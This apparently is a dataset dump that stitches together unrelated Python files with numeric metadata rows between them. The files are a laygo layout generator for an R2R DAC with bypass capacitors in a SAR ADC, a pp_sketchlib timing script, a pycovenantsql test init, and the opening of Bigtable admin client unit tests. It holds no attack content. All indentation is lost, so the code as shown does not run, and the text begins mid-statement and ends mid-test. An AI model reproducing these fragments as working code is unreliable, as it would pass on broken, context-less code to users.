refinstname1=itapl[num_row-1].name, refpinname1='VSS', refinstindex1=np.array([0, 0])))
for j in range(num_row):
laygen.via(None, xy=np.array([2*i+1, 0]), gridname=rg_m2m3, refinstname=itapl[j].name, refpinname='VDD')
laygen.via(None, xy=np.array([2 * i + 2, 0]), gridname=rg_m2m3, refinstname=itapl[j].name, refpinname='VSS')
# laygen.pin(name = 'VDDL'+str(i), layer = laygen.layers['pin'][3], refobj = rvddl_m3[-1], gridname=rg_m2m3, netname='VDD')
# laygen.pin(name = 'VSSL'+str(i), layer = laygen.layers['pin'][3], refobj = rvssl_m3[-1], gridname=rg_m2m3, netname='VSS')
rvddr_m3.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i+1, 0]), xy1=np.array([2*i+1, 0]), gridname0=rg_m2m3,
refinstname0=itapr[0].name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
refinstname1=itapr[num_row-1].name, refpinname1='VSS', refinstindex1=np.array([0, 0])))
rvssr_m3.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i+2, 0]), xy1=np.array([2*i+2, 0]), gridname0=rg_m2m3,
refinstname0=itapr[0].name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
refinstname1=itapr[num_row-1].name, refpinname1='VSS', refinstindex1=np.array([0, 0])))
for j in range(num_row):
laygen.via(None, xy=np.array([2*i+1, 0]), gridname=rg_m2m3, refinstname=itapr[j].name, refpinname='VDD')
laygen.via(None, xy=np.array([2 * i + 2, 0]), gridname=rg_m2m3, refinstname=itapr[j].name, refpinname='VSS')
# laygen.pin(name = 'VDDR'+str(i), layer = laygen.layers['pin'][3], refobj = rvddr_m3[-1], gridname=rg_m2m3, netname='VDD')
# laygen.pin(name = 'VSSR'+str(i), layer = laygen.layers['pin'][3], refobj = rvssr_m3[-1], gridname=rg_m2m3, netname='VSS')
#m4
input_rails_rect = [rvddl_m3, rvssl_m3]
rvddl_m4, rvssl_m4 = laygenhelper.generate_power_rails_from_rails_rect(laygen, routename_tag='L_M4_',
layer=laygen.layers['metal'][4], gridname=rg_m3m4_basic_thick, netnames=['VDD', 'VSS'], direction='x',
input_rails_rect=input_rails_rect, generate_pin=False, overwrite_start_coord=2, overwrite_end_coord=None,
offset_start_index=0, offset_end_index=0)
x1_phy = laygen.get_xy(obj =bnd_right[0])[0]\
+laygen.get_xy(obj =bnd_right[0].template)[0]
x1 = laygen.grids.get_absgrid_x(rg_m3m4_basic_thick, x1_phy)
input_rails_rect = [rvddr_m3, rvssr_m3]
rvddr_m4, rvssr_m4 = laygenhelper.generate_power_rails_from_rails_rect(laygen, routename_tag='R_M4_',
layer=laygen.layers['metal'][4], gridname=rg_m3m4_basic_thick, netnames=['VDD', 'VSS'], direction='x',
input_rails_rect=input_rails_rect, generate_pin=False, overwrite_start_coord=None, overwrite_end_coord=x1-2,
offset_start_index=0, offset_end_index=0)
#m5
input_rails_rect = [rvddl_m4, rvssl_m4]
rvddl_m5, rvssl_m5 = laygenhelper.generate_power_rails_from_rails_rect(laygen, routename_tag='L_M5_',
layer=laygen.layers['pin'][5], gridname=rg_m4m5_thick, netnames=['VDD', 'VSS'], direction='y',
input_rails_rect=input_rails_rect, generate_pin=True, overwrite_start_coord=None, overwrite_end_coord=None,
offset_start_index=0, offset_end_index=0)
y1_phy = laygen.get_xy(obj =bnd_top[0])[1]\
+laygen.get_xy(obj =bnd_top[0].template)[1]
y1 = laygen.grids.get_absgrid_x(rg_m4m5_thick, y1_phy)
input_rails_rect = [rvddr_m4, rvssr_m4]
rvddr_m5, rvssr_m5 = laygenhelper.generate_power_rails_from_rails_rect(laygen, routename_tag='R_M5_',
layer=laygen.layers['pin'][5], gridname=rg_m4m5_thick, netnames=['VDD', 'VSS'], direction='y',
input_rails_rect=input_rails_rect, generate_pin=True, overwrite_start_coord=None, overwrite_end_coord=None,
offset_start_index=0, offset_end_index=0)
def generate_r2rdac_bcap_unit(laygen, objectname_pfix, templib_logic, placement_grid, routing_grid_m2m3, routing_grid_m3m4_basic_thick,
m=2, origin=np.array([0, 0])):
pg = placement_grid
rg_m2m3 = routing_grid_m2m3
rg_m3m4_basic_thick = routing_grid_m3m4_basic_thick
bcap_name = 'bcap2_8x'
# placement
ibcap = laygen.place(name="I" + objectname_pfix + 'BCAP0', templatename=bcap_name,
gridname=pg, xy=origin, template_libname=templib_logic, shape=np.array([m,1]))
# reference coordinates
x0 = laygen.get_inst_pin_xy(ibcap.name, 'VDD', rg_m2m3, index=[m-1, 0])[1][0]
y0 = laygen.get_inst_pin_xy(ibcap.name, 'VDD', rg_m2m3, index=[m-1, 0])[1][1]
# internal routes
for i in range(m-1):
laygen.route(None, laygen.layers['metal'][4],
xy0=laygen.get_inst_pin_xy(ibcap.name, 'I', rg_m3m4_basic_thick, index=[i,0])[0],
xy1=laygen.get_inst_pin_xy(ibcap.name, 'I', rg_m3m4_basic_thick, index=[i+1,0])[0],
gridname0=rg_m3m4_basic_thick, via0=[0,0], via1=[0,0])
for i in range(m):
laygen.route(None, laygen.layers['metal'][3],
xy0=np.array([laygen.get_inst_pin_xy(ibcap.name, 'I', rg_m2m3, index=[i,0])[0][0], 0]),
xy1=np.array([laygen.get_inst_pin_xy(ibcap.name, 'I', rg_m2m3, index=[i,0])[0][0], y0]),
gridname0=rg_m2m3)
rin = laygen.route(None, laygen.layers['metal'][4],
xy0=laygen.get_inst_pin_xy(ibcap.name, 'I', rg_m3m4_basic_thick, index=[0, 0])[0],
xy1=laygen.get_inst_pin_xy(ibcap.name, 'I', rg_m3m4_basic_thick, index=[m-1, 0])[0],
gridname0=rg_m3m4_basic_thick)
# VDD/VSS rails
rvdd = laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, y0]), xy1=np.array([x0, y0]), gridname0=rg_m2m3)
rvss = laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([x0, 0]), gridname0=rg_m2m3)
# pins
laygen.pin_from_rect('I', laygen.layers['pin'][4], rin, rg_m3m4_basic_thick)
laygen.pin_from_rect('VDD', laygen.layers['pin'][2], rvdd, rg_m2m3)
laygen.pin_from_rect('VSS', laygen.layers['pin'][2], rvss, rg_m2m3)
def generate_r2r_dac_bcap(laygen, objectname_pfix, templib_logic, placement_grid, routing_grid_m2m3, routing_grid_m3m4,
rg_m3m4_basic_thick, rg_m4m5_thick, num_bits=9, origin=np.array([0, 0])):
"""generate r2rdac """
inv_name='inv_2x'
tap_name='tap'
bcap_unit_name='r2r_dac_bcap_unit'
pg = placement_grid
rg_m2m3 = routing_grid_m2m3
rg_m3m4 = routing_grid_m3m4
# rg_m4m5 = routing_grid_m4m5
# rg_m4m5_basic_thick = routing_grid_m4m5_basic_thick
# rg_m4m5_thick = routing_grid_m4m5_thick
# rg_m5m6 = routing_grid_m5m6
# rg_m5m6_thick = routing_grid_m5m6_thick
# rg_m5m6_thick_basic = routing_grid_m5m6_thick_basic
# rg_m6m7_thick = routing_grid_m6m7_thick
#boundaries
x0=laygen.templates.get_template('r2r_dac_bcap_unit', workinglib).xy[1][0] + \
laygen.templates.get_template('tap', templib_logic).xy[1][0]*2
m_bnd_float = x0 / laygen.templates.get_template('boundary_bottom').xy[1][0]
m_bnd = int(m_bnd_float)
if not m_bnd_float == m_bnd:
m_bnd += 1
devname_bnd_left = []
devname_bnd_right = []
transform_bnd_left = []
transform_bnd_right = []
num_row=num_bits*4
for i in range(num_row):
if i%2==0:
devname_bnd_left += ['nmos4_fast_left', 'pmos4_fast_left']
devname_bnd_right += ['nmos4_fast_right', 'pmos4_fast_right']
transform_bnd_left += ['R0', 'MX']
transform_bnd_right += ['R0', 'MX']
else:
devname_bnd_left += ['pmos4_fast_left', 'nmos4_fast_left']
devname_bnd_right += ['pmos4_fast_right', 'nmos4_fast_right']
transform_bnd_left += ['R0', 'MX']
transform_bnd_right += ['R0', 'MX']
[bnd_bottom, bnd_top, bnd_left, bnd_right] = generate_boundary(laygen, objectname_pfix='BND0',
placement_grid=pg,
devname_bottom=['boundary_bottomleft',
'boundary_bottom',
'boundary_bottomright'],
shape_bottom=[np.array([1, 1]), np.array([m_bnd, 1]),
np.array([1, 1])],
devname_top=['boundary_topleft', 'boundary_top',
'boundary_topright'],
shape_top=[np.array([1, 1]), np.array([m_bnd, 1]),
np.array([1, 1])],
devname_left=devname_bnd_left,
transform_left=transform_bnd_left,
devname_right=devname_bnd_right,
transform_right=transform_bnd_right,
origin=np.array([0, 0]))
#Calculate layout size
array_origin = origin + laygen.get_template_xy(name='boundary_bottomleft', gridname=pg, libname=utemplib)
tapr_origin = np.array([laygen.get_template_xy(name='r2r_dac_bcap_unit', gridname=pg, libname=workinglib)[0], 0]) \
+ np.array([0, laygen.get_template_xy(name='boundary_bottomleft', gridname=pg, libname=utemplib)[1]]) \
+ np.array([laygen.get_template_xy(name='boundary_bottomleft', gridname=pg, libname=utemplib)[0], 0]) \
+ np.array([laygen.get_template_xy(name=tap_name, gridname=pg, libname=templib_logic)[0], 0])
# placement
itapl = []
ibcap = []
for i in range(num_row):
if i%2 == 0: tf='R0'
else: tf='MX'
if i == 0:
itapl.append(laygen.relplace(name="I" + objectname_pfix + 'ITAPL'+str(i), templatename=tap_name,
gridname=pg, refinstname=None, xy=array_origin, template_libname=templib_logic))
else:
itapl.append(laygen.relplace(name="I" + objectname_pfix + 'ITAPL'+str(i), templatename=tap_name,
gridname=pg, refinstname=itapl[-1].name, template_libname=templib_logic, direction='top', transform=tf))
ibcap.append(laygen.relplace(name="I" + objectname_pfix + 'IBCAP'+str(i), templatename=bcap_unit_name,
gridname=pg, refinstname=itapl[-1].name, template_libname=workinglib, direction='right', transform=tf))
itapr = []
for i in range(num_row):
if i%2 == 0: tf='R0'
else: tf='MX'
if i == 0:
itapr.append(laygen.relplace(name="I" + objectname_pfix + 'ITAPR'+str(i), templatename=tap_name,
gridname=pg, refinstname=None, xy=tapr_origin, template_libname=templib_logic))
else:
itapr.append(laygen.relplace(name="I" + objectname_pfix + 'ITAPR'+str(i), templatename=tap_name,
gridname=pg, refinstname=itapr[-1].name, template_libname=templib_logic, direction='top', transform=tf))
# pins
pdict = laygen.get_inst_pin_xy(None, None, rg_m3m4_basic_thick)
laygen.pin(name='I', layer=laygen.layers['pin'][4], xy=laygen.get_inst_pin_xy(ibcap[-1].name, 'I', rg_m3m4_basic_thick),
gridname=rg_m3m4_basic_thick)
# power pin
pwr_dim=laygen.get_template_xy(name=itapl[0].cellname, gridname=rg_m2m3, libname=itapl[0].libname)
rvddl_m3 = []
rvssl_m3 = []
rvddr_m3 = []
rvssr_m3 = []
for i in range(0, int(pwr_dim[0]/2)):
rvddl_m3.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i+1, 0]), xy1=np.array([2*i+1, 0]), gridname0=rg_m2m3,
refinstname0=itapl[0].name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
refinstname1=itapl[num_row-1].name, refpinname1='VSS', refinstindex1=np.array([0, 0])))
rvssl_m3.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i+2, 0]), xy1=np.array([2*i+2, 0]), gridname0=rg_m2m3,
refinstname0=itapl[0].name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
refinstname1=itapl[num_row-1].name, refpinname1='VSS', refinstindex1=np.array([0, 0])))
for j in range(num_row):
laygen.via(None, xy=np.array([2*i+1, 0]), gridname=rg_m2m3, refinstname=itapl[j].name, refpinname='VDD')
laygen.via(None, xy=np.array([2 * i + 2, 0]), gridname=rg_m2m3, refinstname=itapl[j].name, refpinname='VSS')
# laygen.pin(name = 'VDDL'+str(i), layer = laygen.layers['pin'][3], refobj = rvddl_m3[-1], gridname=rg_m2m3, netname='VDD')
# laygen.pin(name = 'VSSL'+str(i), layer = laygen.layers['pin'][3], refobj = rvssl_m3[-1], gridname=rg_m2m3, netname='VSS')
rvddr_m3.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i+1, 0]), xy1=np.array([2*i+1, 0]), gridname0=rg_m2m3,
refinstname0=itapr[0].name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
refinstname1=itapr[num_row-1].name, refpinname1='VSS', refinstindex1=np.array([0, 0])))
rvssr_m3.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i+2, 0]), xy1=np.array([2*i+2, 0]), gridname0=rg_m2m3,
refinstname0=itapr[0].name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
refinstname1=itapr[num_row-1].name, refpinname1='VSS', refinstindex1=np.array([0, 0])))
for j in range(num_row):
laygen.via(None, xy=np.array([2*i+1, 0]), gridname=rg_m2m3, refinstname=itapr[j].name, refpinname='VDD')
laygen.via(None, xy=np.array([2 * i + 2, 0]), gridname=rg_m2m3, refinstname=itapr[j].name, refpinname='VSS')
# laygen.pin(name = 'VDDR'+str(i), layer = laygen.layers['pin'][3], refobj = rvddr_m3[-1], gridname=rg_m2m3, netname='VDD')
# laygen.pin(name = 'VSSR'+str(i), layer = laygen.layers['pin'][3], refobj = rvssr_m3[-1], gridname=rg_m2m3, netname='VSS')
#m4
input_rails_rect = [rvddl_m3, rvssl_m3]
rvddl_m4, rvssl_m4 = laygenhelper.generate_power_rails_from_rails_rect(laygen, routename_tag='L_M4_',
layer=laygen.layers['metal'][4], gridname=rg_m3m4_basic_thick, netnames=['VDD', 'VSS'], direction='x',
input_rails_rect=input_rails_rect, generate_pin=False, overwrite_start_coord=2, overwrite_end_coord=None,
offset_start_index=0, offset_end_index=0)
x1_phy = laygen.get_xy(obj =bnd_right[0])[0]\
+laygen.get_xy(obj =bnd_right[0].template)[0]
x1 = laygen.grids.get_absgrid_x(rg_m3m4_basic_thick, x1_phy)
input_rails_rect = [rvddr_m3, rvssr_m3]
rvddr_m4, rvssr_m4 = laygenhelper.generate_power_rails_from_rails_rect(laygen, routename_tag='R_M4_',
layer=laygen.layers['metal'][4], gridname=rg_m3m4_basic_thick, netnames=['VDD', 'VSS'], direction='x',
input_rails_rect=input_rails_rect, generate_pin=False, overwrite_start_coord=None, overwrite_end_coord=x1-2,
offset_start_index=0, offset_end_index=0)
#m5
input_rails_rect = [rvddl_m4, rvssl_m4]
rvddl_m5, rvssl_m5 = laygenhelper.generate_power_rails_from_rails_rect(laygen, routename_tag='L_M5_',
layer=laygen.layers['pin'][5], gridname=rg_m4m5_thick, netnames=['VDD', 'VSS'], direction='y',
input_rails_rect=input_rails_rect, generate_pin=True, overwrite_start_coord=None, overwrite_end_coord=None,
offset_start_index=0, offset_end_index=0)
y1_phy = laygen.get_xy(obj =bnd_top[0])[1]\
+laygen.get_xy(obj =bnd_top[0].template)[1]
y1 = laygen.grids.get_absgrid_x(rg_m4m5_thick, y1_phy)
input_rails_rect = [rvddr_m4, rvssr_m4]
rvddr_m5, rvssr_m5 = laygenhelper.generate_power_rails_from_rails_rect(laygen, routename_tag='R_M5_',
layer=laygen.layers['pin'][5], gridname=rg_m4m5_thick, netnames=['VDD', 'VSS'], direction='y',
input_rails_rect=input_rails_rect, generate_pin=True, overwrite_start_coord=None, overwrite_end_coord=None,
offset_start_index=0, offset_end_index=0)
if __name__ == '__main__':
laygen = laygo.GridLayoutGenerator(config_file="laygo_config.yaml")
import imp
try:
imp.find_module('bag')
laygen.use_phantom = False
except ImportError:
laygen.use_phantom = True
tech=laygen.tech
utemplib = tech+'_microtemplates_dense'
logictemplib = tech+'_logic_templates'
ret_libname = 'adc_retimer_ec'
clkdist_libname = 'clk_dis_generated'
laygen.load_template(filename=tech+'_microtemplates_dense_templates.yaml', libname=utemplib)
laygen.load_grid(filename=tech+'_microtemplates_dense_grids.yaml', libname=utemplib)
laygen.load_template(filename=logictemplib+'.yaml', libname=logictemplib)
# laygen.load_template(filename='adc_retimer.yaml', libname=ret_libname)
#laygen.load_template(filename=ret_libname+'.yaml', libname=ret_libname)
laygen.load_template(filename=clkdist_libname+'.yaml', libname=clkdist_libname)
laygen.templates.sel_library(utemplib)
laygen.grids.sel_library(utemplib)
#library load or generation
workinglib = 'adc_sar_generated'
laygen.add_library(workinglib)
laygen.sel_library(workinglib)
if os.path.exists(workinglib+'.yaml'): #generated layout file exists
laygen.load_template(filename=workinglib+'.yaml', libname=workinglib)
laygen.templates.sel_library(utemplib)
#grid
pg = 'placement_basic' #placement grid
rg_m1m2 = 'route_M1_M2_cmos'
rg_m1m2_thick = 'route_M1_M2_thick'
rg_m2m3 = 'route_M2_M3_cmos'
rg_m3m4 = 'route_M3_M4_basic'
rg_m3m4_thick = 'route_M3_M4_thick'
rg_m3m4_basic_thick = 'route_M3_M4_basic_thick'
rg_m4m5 = 'route_M4_M5_basic'
rg_m4m5_thick = 'route_M4_M5_thick'
rg_m4m5_basic_thick = 'route_M4_M5_basic_thick'
rg_m5m6 = 'route_M5_M6_basic'
rg_m5m6_thick = 'route_M5_M6_thick'
rg_m5m6_thick_basic = 'route_M5_M6_thick_basic'
rg_m5m6_basic_thick = 'route_M5_M6_basic_thick'
rg_m5m6_thick2_thick = 'route_M5_M6_thick2_thick'
rg_m6m7_thick = 'route_M6_M7_thick'
rg_m6m7_thick2_thick = 'route_M6_M7_thick2_thick'
rg_m1m2_pin = 'route_M1_M2_basic'
rg_m2m3_pin = 'route_M2_M3_basic'
mycell_list = []
num_bits=9
num_slices=9
slice_order=[0,2,4,6,1,3,5,7]
#load from preset
load_from_file=True
yamlfile_spec="adc_sar_spec.yaml"
yamlfile_size="adc_sar_size.yaml"
if load_from_file==True:
with open(yamlfile_spec, 'r') as stream:
specdict = yaml.load(stream)
with open(yamlfile_size, 'r') as stream:
sizedict = yaml.load(stream)
num_bits=sizedict['r2rdac']['num_bits']
num_slices=specdict['n_interleave']
m_latch=sizedict['retimer']['ret_m_latch']
m_ibuf=sizedict['retimer']['ret_m_ibuf']
m_obuf=sizedict['retimer']['ret_m_obuf']
m_srbuf=sizedict['retimer']['ret_m_srbuf']
m_sr=sizedict['retimer']['ret_m_sr']
slice_order=sizedict['slice_order']
m=sizedict['r2rdac']['m']
m_bcap=sizedict['r2rdac']['m_bcap']
num_series=sizedict['r2rdac']['num_series']
sar_name = 'sar_wsamp_bb_doubleSA_array'
ret_name = 'adc_retimer'
clkdist_name = 'clk_dis_viadel_htree'
#tisar_space_name = 'tisaradc_body_space'
space_1x_name = 'space_1x'
#r2r unit
cellname='r2r_dac_unit'
print(cellname+" generating")
mycell_list.append(cellname)
laygen.add_cell(cellname)
laygen.sel_cell(cellname)
generate_r2rdac_unit(laygen, objectname_pfix='R2RUNIT', templib_logic=logictemplib, placement_grid=pg, routing_grid_m2m3=rg_m2m3,
routing_grid_m3m4=rg_m3m4, m=m, m_series=num_series, origin=np.array([0, 0]))
laygen.add_template_from_cell()
#r2r half unit
cellname='r2r_dac_unit_half'
print(cellname+" generating")
mycell_list.append(cellname)
laygen.add_cell(cellname)
laygen.sel_cell(cellname)
generate_r2rdac_unit(laygen, objectname_pfix='R2RUNIT_half', templib_logic=logictemplib, placement_grid=pg, routing_grid_m2m3=rg_m2m3,
routing_grid_m3m4=rg_m3m4, m=m, m_series=int(num_series/2), origin=np.array([0, 0]))
laygen.add_template_from_cell()
# r2r dac
cellname = 'r2r_dac'
print(cellname + " generating")
mycell_list.append(cellname)
laygen.add_cell(cellname)
laygen.sel_cell(cellname)
generate_r2r_dac(laygen, objectname_pfix='R2R', templib_logic=logictemplib, placement_grid=pg, routing_grid_m2m3=rg_m2m3,
routing_grid_m3m4=rg_m3m4, rg_m3m4_basic_thick=rg_m3m4_basic_thick, rg_m4m5_thick=rg_m4m5_thick,
num_bits=num_bits, origin=np.array([0, 0]))
laygen.add_template_from_cell()
# r2r dac bcap unit
cellname = 'r2r_dac_bcap_unit'
print(cellname + " generating")
mycell_list.append(cellname)
laygen.add_cell(cellname)
laygen.sel_cell(cellname)
generate_r2rdac_bcap_unit(laygen, objectname_pfix='BCAPUNIT', templib_logic=logictemplib, placement_grid=pg, routing_grid_m2m3=rg_m2m3,
routing_grid_m3m4_basic_thick=rg_m3m4_basic_thick, m=m_bcap, origin=np.array([0, 0]))
laygen.add_template_from_cell()
# r2r dac
cellname = 'r2r_dac_bcap'
print(cellname + " generating")
mycell_list.append(cellname)
laygen.add_cell(cellname)
laygen.sel_cell(cellname)
generate_r2r_dac_bcap(laygen, objectname_pfix='R2R_bcap', templib_logic=logictemplib, placement_grid=pg, routing_grid_m2m3=rg_m2m3,
routing_grid_m3m4=rg_m3m4, rg_m3m4_basic_thick=rg_m3m4_basic_thick, rg_m4m5_thick=rg_m4m5_thick,
num_bits=num_bits, origin=np.array([0, 0]))
laygen.add_template_from_cell()
laygen.save_template(filename=workinglib+'.yaml', libname=workinglib)
#bag export, if bag does not exist, gds export
import imp
try:
imp.find_module('bag')
import bag
prj = bag.BagProject()
for mycell in mycell_list:
laygen.sel_cell(mycell)
laygen.export_BAG(prj, array_delimiter=['[', ']'])
except ImportError:
laygen.export_GDS('output.gds', cellname=mycell_list, layermapfile=tech+".layermap") # change layermapfile
| 63.64455 | 151 | 0.604717 | 7,256 | 53,716 | 4.210998 | 0.062431 | 0.032695 | 0.03659 | 0.041368 | 0.81332 | 0.782785 | 0.752839 | 0.72993 | 0.702307 | 0.663983 | 0 | 0.045312 | 0.253481 | 53,716 | 843 | 152 | 63.720047 | 0.716658 | 0.088819 | 0 | 0.522388 | 0 | 0 | 0.058533 | 0.005271 | 0 | 0 | 0 | 0 | 0 | 1 | 0.008955 | false | 0 | 0.016418 | 0 | 0.026866 | 0.007463 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f41ca483fb2e8120890a441a6438c8d9e3d8602a | 1,180 | py | Python | test/dist_test.py | nickjcroucher/pp-sketchlib | 66778ab4d8b593b88e0eac3b35cb54c424b32127 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 19 | 2020-01-15T20:58:38.000Z | 2021-08-17T19:26:16.000Z | test/dist_test.py | nickjcroucher/pp-sketchlib | 66778ab4d8b593b88e0eac3b35cb54c424b32127 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 38 | 2020-01-17T08:49:34.000Z | 2022-02-08T20:00:14.000Z | test/dist_test.py | nickjcroucher/pp-sketchlib | 66778ab4d8b593b88e0eac3b35cb54c424b32127 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 5 | 2020-07-12T13:31:51.000Z | 2021-08-24T13:50:42.000Z | import timeit, functools
def dist_test():
pp_sketchlib.queryDatabase("listeria", "listeria", names, names, kmers, 1)
setup = """
import sys
sys.path.insert(0, "build/lib.macosx-10.9-x86_64-3.7")
import pp_sketchlib
"""
#import numpy as np
#
#from __main__ import dist_test
#
#kmers = np.arange(15, 30, 3)
#
#names = []
#sequences = []
#with open("rfiles.txt", 'r') as refFile:
# for refLine in refFile:
# refFields = refLine.rstrip().split("\t")
# names.append(refFields[0])
# sequences.append(list(refFields[1:]))
#"""
if __name__ == '__main__':
import numpy as np
import sys
sys.path.insert(0, "build/lib.macosx-10.9-x86_64-3.7")
import pp_sketchlib
#from __main__ import dist_test
kmers = np.arange(15, 30, 3)
names = []
sequences = []
with open("rfiles.txt", 'r') as refFile:
for refLine in refFile:
refFields = refLine.rstrip().split("\t")
names.append(refFields[0])
sequences.append(list(refFields[1:]))
t = timeit.Timer(functools.partial(pp_sketchlib.queryDatabase, "listeria", "listeria", names, names, kmers, 1), setup=setup)
print(t.timeit(100))
| 23.6 | 128 | 0.636441 | 159 | 1,180 | 4.566038 | 0.358491 | 0.060606 | 0.066116 | 0.088154 | 0.834711 | 0.834711 | 0.834711 | 0.834711 | 0.834711 | 0.834711 | 0 | 0.041489 | 0.20339 | 1,180 | 49 | 129 | 24.081633 | 0.730851 | 0.277119 | 0 | 0.26087 | 0 | 0.043478 | 0.207637 | 0.079952 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0 | 0.26087 | 0 | 0.304348 | 0.043478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f447bca32306685eda08ce2e124523bbd5a86ca9 | 453 | py | Python | pycovenantsql/tests/__init__.py | CovenantSQL/python-driver | 63b96f6b5b1d519cab6dfe2cec132556668a22a3 | [
"Apache-2.0"
] | 5 | 2018-10-17T16:35:11.000Z | 2019-05-20T01:56:24.000Z | pycovenantsql/tests/__init__.py | CovenantSQL/python-driver | 63b96f6b5b1d519cab6dfe2cec132556668a22a3 | [
"Apache-2.0"
] | null | null | null | pycovenantsql/tests/__init__.py | CovenantSQL/python-driver | 63b96f6b5b1d519cab6dfe2cec132556668a22a3 | [
"Apache-2.0"
] | 1 | 2019-03-29T23:51:36.000Z | 2019-03-29T23:51:36.000Z | from pycovenantsql.tests.test_basic import *
from pycovenantsql.tests.test_connection import *
from pycovenantsql.tests.test_cursor import *
#from pycovenantsql.tests.test_converters import *
#from pycovenantsql.tests.test_err import *
#from pycovenantsql.tests.test_issues import *
#from pycovenantsql.tests.test_nextset import *
#from pycovenantsql.tests.test_optionfile import *
if __name__ == "__main__":
import unittest2
unittest2.main()
| 32.357143 | 50 | 0.810155 | 55 | 453 | 6.381818 | 0.309091 | 0.387464 | 0.501425 | 0.592593 | 0.638177 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004951 | 0.108168 | 453 | 13 | 51 | 34.846154 | 0.863861 | 0.509934 | 0 | 0 | 0 | 0 | 0.037037 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f489dee392093f2e0ec7bc37dc78e2e15b5941ef | 20,618 | py | Python | bigtable/tests/unit/gapic/v2/test_bigtable_table_admin_client_v2.py | jo2y/google-cloud-python | 1b76727be16bc4335276f793340bb72d32be7166 | [
"Apache-2.0"
] | 1 | 2018-06-29T17:53:28.000Z | 2018-06-29T17:53:28.000Z | bigtable/tests/unit/gapic/v2/test_bigtable_table_admin_client_v2.py | jo2y/google-cloud-python | 1b76727be16bc4335276f793340bb72d32be7166 | [
"Apache-2.0"
] | null | null | null | bigtable/tests/unit/gapic/v2/test_bigtable_table_admin_client_v2.py | jo2y/google-cloud-python | 1b76727be16bc4335276f793340bb72d32be7166 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests."""
import pytest
from google.rpc import status_pb2
from google.cloud import bigtable_admin_v2
from google.cloud.bigtable_admin_v2.proto import bigtable_table_admin_pb2
from google.cloud.bigtable_admin_v2.proto import table_pb2
from google.longrunning import operations_pb2
from google.protobuf import empty_pb2
class MultiCallableStub(object):
"""Stub for the grpc.UnaryUnaryMultiCallable interface."""
def __init__(self, method, channel_stub):
self.method = method
self.channel_stub = channel_stub
def __call__(self, request, timeout=None, metadata=None, credentials=None):
self.channel_stub.requests.append((self.method, request))
response = None
if self.channel_stub.responses:
response = self.channel_stub.responses.pop()
if isinstance(response, Exception):
raise response
if response:
return response
class ChannelStub(object):
"""Stub for the grpc.Channel interface."""
def __init__(self, responses=[]):
self.responses = responses
self.requests = []
def unary_unary(self,
method,
request_serializer=None,
response_deserializer=None):
return MultiCallableStub(method, self)
class CustomException(Exception):
pass
class TestBigtableTableAdminClient(object):
def test_create_table(self):
# Setup Expected Response
name = 'name3373707'
expected_response = {'name': name}
expected_response = table_pb2.Table(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
parent = client.instance_path('[PROJECT]', '[INSTANCE]')
table_id = 'tableId-895419604'
table = {}
response = client.create_table(parent, table_id, table)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.CreateTableRequest(
parent=parent, table_id=table_id, table=table)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_create_table_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
parent = client.instance_path('[PROJECT]', '[INSTANCE]')
table_id = 'tableId-895419604'
table = {}
with pytest.raises(CustomException):
client.create_table(parent, table_id, table)
def test_create_table_from_snapshot(self):
# Setup Expected Response
name = 'name3373707'
expected_response = {'name': name}
expected_response = table_pb2.Table(**expected_response)
operation = operations_pb2.Operation(
name='operations/test_create_table_from_snapshot', done=True)
operation.response.Pack(expected_response)
# Mock the API response
channel = ChannelStub(responses=[operation])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
parent = client.instance_path('[PROJECT]', '[INSTANCE]')
